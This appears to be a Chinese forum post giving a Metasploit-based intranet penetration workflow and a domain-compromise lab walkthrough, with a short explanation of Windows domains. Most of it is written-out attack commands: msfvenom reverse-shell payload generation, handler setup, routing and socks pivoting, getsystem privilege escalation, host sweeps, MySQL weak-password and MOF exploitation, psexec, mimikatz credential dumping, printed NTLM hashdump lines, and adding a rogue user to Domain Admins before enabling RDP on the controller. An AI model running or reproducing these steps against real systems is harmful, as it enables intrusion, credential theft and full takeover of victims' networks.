本帖最后由 zhaorong 于 2021-7-15 15:19 编辑
记内网渗透的流程
内网渗透有很多方法,下面介绍的是使用kali的metasploit.
使用metasploit内网渗透的一般流程
metasploit生成攻击载荷(window/linux/php...)
- msfVENOM -p windows/meterpreter/reverse_tcp lhost=192.168.0.x lport=xx
- x -f exe >/var/www/html/1.exe
复制代码
本地监听
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 192.168.0.x
- set lport xxx
- exploit
复制代码
增加路由
- run autoroute -s x.x.x.x/24
- run autoroute –p
复制代码
增加代理
- use auxiliary/server/socks4a
- 打开/etc/prxoychains.conf文件修改
复制代码
hash收集
提权
- getuid 当前用户
- sysinfo 查看系统信息
- getprivs 尽可能提升权限
- getsystem 通过各种攻击向量来提升系统用户权限 等等。。。
复制代码
查看ip地址详情
探测内网存活IP
- run post/windows/gather/arp_scanner RHOSTS=192.168.x.0/24
- run post/multi/gather/ping_sweep RHOSTS=192.168.x.0/24
复制代码
保持会话,利用其它的攻击模块攻击内网其它主机
一次内网渗透实验
1.域的原理:
其实可以把域和[工作组]联系起来理解 在工作组上你一切的设置在本机上进行包括各种策略 用户登录也是登录在本机的 密码是放
在本机的数据库来验证的。而如果你的计算机加入域的话 各种策略是[域控制器]统一设定 用户名和密码也是放到域控制器去验证
也就是说你的账号密码可以在同一域的任何一台计算机登录。
如果说工作组是 免费的旅店 那么域(Domain)就是 星级的宾馆 ;工作组可以随便出出进进 而域则需要严格控制
域 的
真正含义指的是服务器控制网络上的计算机能否加入的计算机组合。一提到组合 势必需要严格的控制。所以实行严格的管理对
网络安全是非常必要的。在对等网模式下 任何一台电脑只要接入网络 其他机器就都可以访问共享资源 如[共享上网]等尽管
对等网络]上的共享文件可以加访问密码 但是非常容易被破解。在由Windows 9x构成的对等网中 数据的传输是非常不安全的 [1]
不过在
域 模式下 至少有一台服务器负责每一台联入网络的电脑和用户的验证工作 相当于一个单位
的门卫一样称为 [域控制器] Domain Controller 简写为DC 。
域控制器中包含了由这个域的账户 密码 属于这个域的计算机等信息构成的数据库。当电脑联入网络时 域控制器首先要鉴别这
台电脑是否是属于这个域的 用户使用的登录账号是否存在、密码是否正确。如果以上信息有一样不正确,那么域控制器就会拒
绝这个用户从这台电脑登录。不能登录 用户就不能访问服务器上有权限保护的资源 他只能以对等网用户的方式访问Windows
共享出来的资源 这样就在一定程度上保护了网络上的资源。
域控制器
在Windows域中 该目录驻留在配置为
域控制器 的计算机上。域控制器是Windows或
Samba 服务器 它管理用户和域交互之间
的所有安全相关方面 集中安全性和管理。域控制器通常适用于具有10[台]以上PC的网络。域是计算机的逻辑分组。域中的计算机
可以在小型[LAN]上共享物理接近度 或者它们可以位于世界的不同部分。只要他们能够沟通 他们的实际位置就无关紧要了 。
2.常用的域命令
1.查看当前网卡配置信息 包括所属域以及IP段
2.查看域
3.查看当前域中的计算机
4.查看CORP域中的计算机
5.Ping计算机名可以得到IP
7.获取域用户组信息(在域控查看)
8.获取当前域管理员信息(在域控查看)
- net group "domain admins" /domain
复制代码
9.查看域时间及域服务器的名字(在域控查看)
这个要域管理权限才可以的
10.添加普通域用户
- net user hack hack /add /domain
复制代码
11.将普通域用户提升为域管理员
- net group "Domain Admins" hack /add /domain
复制代码
3.利用metasploit生成后门
生成攻击载荷
- msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.220.
- 135 lport=12345 -f exe >/var/www/html/s.exe
复制代码
本地监听
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost 192.168.220.135(kali的IP地址)
- set lport 12345(kali的端口)
- exploit
复制代码
成功运行木马meterpreter后:
- getuid 当前用户
- getprivs 尽可能提升权限
- getsystem 通过各种攻击向量来提升系统用户权限
复制代码
增加路由
- route add 10.10.1.3 255.255.255.0 (内网路由)
复制代码
先扫描目标开放的端口在接下去看mysql
- use auxiliary/scanner/mysql/mysql_login(查看是否可弱口令登入)
复制代码
- use exploit/windows/smb/p**ec
复制代码
- use exploit/windows/mysql/mysql_mof mysql之mof提权
复制代码
- Set payload windows/meterpreter/bind_tcp
复制代码
(反弹内网的机子到外网的kali:内网的无法直接和外网通信)
通过mysql mof提权 得到 域客户机2003的 sessions
Shell:
通过ping内网的主机名 得到其IP地址
查看域的时间来确定域控制器是win_723。。。
获取 hashdump
获取明文
- load mimikatz
- msv
- kerberos
复制代码
通过扫描得扫 10.10.1.3 3306端口 存在mysql服务
因为普通域用户 需要更改系统信息 都需要通过域管理员的操作 要输入帐号和密码
- use exploit/windows/smb/p**ec
复制代码
进入域控
注入进程
- run post/windows/gather/hashdump
- Administrator:500:aad3b435b51404eeaad3b435b51404ee:f8db9dd8aa13fa4e008f693fb7c56935:::
- Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
复制代码
在百度查找在线hash解密
开启域控3389
得到域控的权限。
开启代理socks4需要修改kali的/etc/proxychains.conf
最终实现在kal上远程操作内网域控